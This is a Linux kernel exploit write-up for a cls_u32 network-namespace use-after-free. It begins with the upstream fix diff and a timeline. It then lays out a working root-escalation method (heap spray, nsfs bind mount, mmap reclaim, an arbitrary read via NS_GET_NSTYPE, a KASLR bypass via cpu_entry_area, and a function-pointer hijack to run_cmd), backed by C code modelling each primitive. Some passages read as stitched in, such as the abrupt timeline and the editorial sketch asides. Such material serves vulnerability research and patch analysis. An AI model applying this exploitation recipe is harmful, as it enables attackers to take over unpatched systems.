    cls_u32: use tcf_exts_get_net() before call_rcu()

    Hold netns refcnt before call_rcu() and release it after
    the tcf_exts_destroy() is done.

    Note, on ->destroy() path we have to respect the return value
    of tcf_exts_get_net(), on other paths it should always return
    true, so we don't need to care.

    Cc: Lucas Bates <lucasb@mojatatu.com>
    Cc: Jamal Hadi Salim <jhs@mojatatu.com>
    Cc: Jiri Pirko <jiri@resnulli.us>
    Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
    Signed-off-by: David S. Miller <davem@davemloft.net>

diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
index dadd1b344497..b58eccb21f03 100644
--- a/net/sched/cls_u32.c
+++ b/net/sched/cls_u32.c
@@ -399,6 +399,7 @@ static int u32_destroy_key(struct tcf_proto *tp, struct tc_u_knode *n,
                           bool free_pf)
 {
        tcf_exts_destroy(&n->exts);
+       tcf_exts_put_net(&n->exts);
        if (n->ht_down)
                n->ht_down->refcnt--;
 #ifdef CONFIG_CLS_U32_PERF
@@ -476,6 +477,7 @@ static int u32_delete_key(struct tcf_proto *tp, struct tc_u_knode *key)
                                RCU_INIT_POINTER(*kp, key->next);

                                tcf_unbind_filter(tp, &key->res);
+                               tcf_exts_get_net(&key->exts);
                                call_rcu(&key->rcu, u32_delete_key_freepf_rcu);
                                return 0;
                        }
The vulnerability was therefore present from November 6, 2017 to April 13, 2022, about four and a half years.

Timeline

Date              Event
July 27, 2021     Vulnerability confirmed
October 2021      Exploit completed
April 12, 2022    syzbot hits a similar vulnerability
April 13, 2022    Fixed by the community
August 2022       Used in a domestic competition

Exploit

Exploitation proceeds in two stages:
  • Leak information to bypass address randomization (KASLR);
  • Escalate privileges through run_cmd.

Information Leakage

Step 1: Heap Layout
  • Fill the free net objects in the existing slabs.
  • Exhaust every page already held by the net-specific slab cache, so that newly allocated nets come from pages freshly allocated by the system. In the figure, the yellow area represents the sprayed net objects, such as SLAB 1 and SLAB 2.
  • Create a victim net from the newly allocated slab (the red area in the figure).
  • Then fill up the rest of the slab that holds the victim. As shown in the figure, slab A and slab B, each 8 pages in size, are filled completely with net objects.
Step 2: Mount the net namespace

Bind-mount the namespace file so that the victim net can still be reached through this file later.
mount("/proc/self/ns/net", "./mynetns", "nsfs", MS_BIND, NULL)
Step 3: Return the pages holding the victim to the buddy system

Use u32_destroy_key() to decrement the victim's reference count by 1.

Step 4: Reclaim the victim's physical pages with a user-mode mmap spray

The physical pages returned to the system in Step 3 are allocated again from user mode through mmap.

Step 5: Construct an arbitrary address read

Calling ioctl(NS_GET_NSTYPE) on the file mounted in Step 2 returns the value of ns->ops->type to user mode. Because the ops pointer now lies in memory the attacker controls, this becomes an arbitrary address read.
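The pointer arithmetic behind this read can be modelled in userspace. The structures below are stand-ins that copy the field order of ns_common and proc_ns_operations and assume no structure layout randomization; the arb_* names are invented for this sketch. Each read returns one int, so a 64-bit value takes two reads.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for the start of proc_ns_operations (assumed unrandomized). */
struct arb_ops {
    const char *name;
    const char *real_ns_name;
    int type;
};

/* Stand-in for ns_common; ops is kept as void * in this model. */
struct arb_ns {
    long stashed;
    const void *ops;
    unsigned int inum;
    unsigned int count;
};

/* What NS_GET_NSTYPE boils down to: load the int at ops + offsetof(type). */
int arb_get_nstype(const struct arb_ns *ns)
{
    int type;

    memcpy(&type, (const char *)ns->ops + offsetof(struct arb_ops, type),
           sizeof(type));
    return type;
}

/* Aim the fake ops pointer so that its type field overlaps target. */
void arb_aim(struct arb_ns *fake, const void *target)
{
    fake->ops = (const void *)((uintptr_t)target -
                               offsetof(struct arb_ops, type));
}

/* Read 64 bits as two 32-bit halves (little-endian, as on x86-64). */
uint64_t arb_read64(struct arb_ns *fake, const void *target)
{
    uint32_t lo, hi;

    arb_aim(fake, target);
    lo = (uint32_t)arb_get_nstype(fake);
    arb_aim(fake, (const char *)target + 4);
    hi = (uint32_t)arb_get_nstype(fake);
    return ((uint64_t)hi << 32) | lo;
}
```

One practical wrinkle, stated here as an expectation rather than something the original covers: when the real ioctl returns a value between -4095 and -1, the C library reports it as a failure and stores the negated value in errno, so such reads have to be recovered from errno.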

Step 6: Read cpu_entry_area to bypass KASLR

The virtual address of cpu_entry_area (0xfffffe0000000000) is fixed, and the memory there contains a kernel text address that has already been shifted by KASLR. Reading it allows the offset to be computed and KASLR to be bypassed.
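The offset calculation itself is plain subtraction. In the sketch below the function names are invented for this example, and the 2 MiB alignment check is an assumption based on the default x86-64 configuration; the unslid address of the leaked symbol would come from the target kernel's symbol table.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumption: the KASLR slide is a multiple of 2 MiB on default x86-64 builds. */
#define ASSUMED_SLIDE_ALIGN 0x200000ULL

/* Slide = address observed at run time minus the address in the symbol table. */
uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t unslid_addr)
{
    return leaked_addr - unslid_addr;
}

/* Cheap sanity check that the leak and the chosen symbol really match. */
bool slide_looks_valid(uint64_t slide)
{
    return (slide % ASSUMED_SLIDE_ALIGN) == 0;
}

/* Translate any other symbol-table address into its run-time address. */
uint64_t rebase(uint64_t unslid_addr, uint64_t slide)
{
    return unslid_addr + slide;
}
```

If the alignment check fails, the most likely explanation is that the leaked pointer belongs to a different symbol than the one assumed.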

fs/nsfs.c
static long ns_ioctl(struct file *filp, unsigned int ioctl,
                        unsigned long arg)
{
        struct user_namespace *user_ns;
        struct ns_common *ns = get_proc_ns(file_inode(filp));
        uid_t __user *argp;
        uid_t uid;

        switch (ioctl) {
        case NS_GET_USERNS:
                return open_related_ns(ns, ns_get_owner);
        case NS_GET_PARENT:
                if (!ns->ops->get_parent)
                        return -EINVAL;
                return open_related_ns(ns, ns->ops->get_parent);
        case NS_GET_NSTYPE:
                return ns->ops->type;    /* <--- arbitrary address read */
        case NS_GET_OWNER_UID:
                if (ns->ops->type != CLONE_NEWUSER)
                        return -EINVAL;
                user_ns = container_of(ns, struct user_namespace, ns);
                argp = (uid_t __user *) arg;
                uid = from_kuid_munged(current_user_ns(), user_ns->owner);
                return put_user(uid, argp);
        default:
                return -ENOTTY;
        }
}
include/linux/ns_common.h
struct ns_common {
        atomic_long_t stashed;
        const struct proc_ns_operations *ops;    /* <--- */
        unsigned int inum;
        refcount_t count;
};

Elevate Privileges Through run_cmd

After bypassing address randomization, the next step of privilege escalation can be performed.
  • Read the address of the victim net
Walk the task list to find the current task_struct, read the nsproxy pointer from it, and then read the net pointer from nsproxy.
  • Construct fake ops in user mode
Point the ops pointer to the fake ops.
  • Hijack the PC
int open_related_ns(struct ns_common *ns,
                   struct ns_common *(*get_ns)(struct ns_common *ns))
{
        struct path path = {};
        struct file *f;
        int err;
        int fd;

        fd = get_unused_fd_flags(O_CLOEXEC);
        if (fd < 0)
                return fd;

        do {
                struct ns_common *relative;

                relative = get_ns(ns);
                if (IS_ERR(relative)) {
                        put_unused_fd(fd);
                        return PTR_ERR(relative);
                }

                err = __ns_get_path(&path, relative);
        } while (err == -EAGAIN);

        if (err) {
                put_unused_fd(fd);
                return err;
        }

        f = dentry_open(&path, O_RDONLY, current_cred());
        path_put(&path);
        if (IS_ERR(f)) {
                put_unused_fd(fd);
                fd = PTR_ERR(f);
        } else
                fd_install(fd, f);

        return fd;
}
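The owner callback is where the PC is finally hijacked: ioctl(NS_GET_USERNS) calls open_related_ns(ns, ns_get_owner), which in turn calls ns->ops->owner(ns). Because the contents of ns are also attacker-controlled, run_cmd can be executed to complete the privilege escalation.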
kernel/user_namespace.c
struct ns_common *ns_get_owner(struct ns_common *ns)
{
        struct user_namespace *my_user_ns = current_user_ns();
        struct user_namespace *owner, *p;

        /* See if the owner is in the current user namespace */
        owner = p = ns->ops->owner(ns);    /* <--- PC hijack */
        for (;;) {
                if (!p)
                        return ERR_PTR(-EPERM);
                if (p == my_user_ns)
                        break;
                p = p->parent;
        }

        return &get_user_ns(owner)->ns;
}
include/linux/proc_ns.h
struct proc_ns_operations {
        const char *name;
        const char *real_ns_name;
        int type;
        struct ns_common *(*get)(struct task_struct *task);
        void (*put)(struct ns_common *ns);
        int (*install)(struct nsset *nsset, struct ns_common *ns);
        struct user_namespace *(*owner)(struct ns_common *ns);    /* <--- */
        struct ns_common *(*get_parent)(struct ns_common *ns);
} __randomize_layout;
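The control-flow part of this step can be shown with a userspace model. The hijack_* types below are stand-ins that copy the member order of the structures above, and hijack_payload is a placeholder for whatever function the attacker chooses; nothing here touches the kernel. The point is that the indirect call receives the ns pointer as its first argument, so whoever controls both the ops table and the ns contents controls the callee and its argument.

```c
#include <stddef.h>

struct hijack_ns;

/* Stand-in with the same member order as proc_ns_operations. */
struct hijack_ops {
    const char *name;
    const char *real_ns_name;
    int type;
    void *(*get)(void *task);
    void (*put)(struct hijack_ns *ns);
    int (*install)(void *nsset, struct hijack_ns *ns);
    void *(*owner)(struct hijack_ns *ns);
    void *(*get_parent)(struct hijack_ns *ns);
};

/* Stand-in with the same member order as ns_common. */
struct hijack_ns {
    long stashed;
    const struct hijack_ops *ops;
    unsigned int inum;
    unsigned int count;
};

/* Records which argument the payload was called with. */
struct hijack_ns *hijack_seen_arg;

/* Placeholder for the attacker-chosen function. */
void *hijack_payload(struct hijack_ns *ns)
{
    hijack_seen_arg = ns;
    return NULL;
}

/* The indirect call made at the top of ns_get_owner(). */
void *hijack_ns_get_owner(struct hijack_ns *ns)
{
    return ns->ops->owner(ns);
}
```

In the model, pointing ops at a table whose owner member is hijack_payload is enough for hijack_ns_get_owner() to run it with the fake ns as its argument.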
